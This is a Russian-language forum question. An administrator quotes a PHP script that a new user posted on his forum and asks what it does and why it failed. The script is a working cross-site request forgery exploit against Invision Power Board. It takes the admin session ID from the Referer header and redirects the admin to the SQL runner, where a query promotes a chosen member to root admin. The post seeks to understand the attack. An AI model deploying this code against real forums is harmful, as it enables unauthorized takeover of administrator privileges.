Захожу я сегодня к себе на форум и вижу пост от новенького пользователя (ник естественно просто набор букв) со скриптом. Ясно дело, что он пытался не мод новый испробовать. Часть его я понял, но не могли бы вы подробнее рассказать, что именно этот юзер хотел и почему у него, вроде как, ничего не вышло?
Скрипт:
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql& code=runsql&query=UPDATE+{$prefix}members+SET+
mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
}
?>
Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.
Вопрос
LordBone
Приветствую.
Захожу я сегодня к себе на форум и вижу пост от новенького пользователя (ник естественно просто набор букв) со скриптом. Ясно дело, что он пытался не мод новый испробовать. Часть его я понял, но не могли бы вы подробнее рассказать, что именно этот юзер хотел и почему у него, вроде как, ничего не вышло?
Скрипт:
Ссылка на комментарий
Поделиться на других сайтах
27 ответов на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.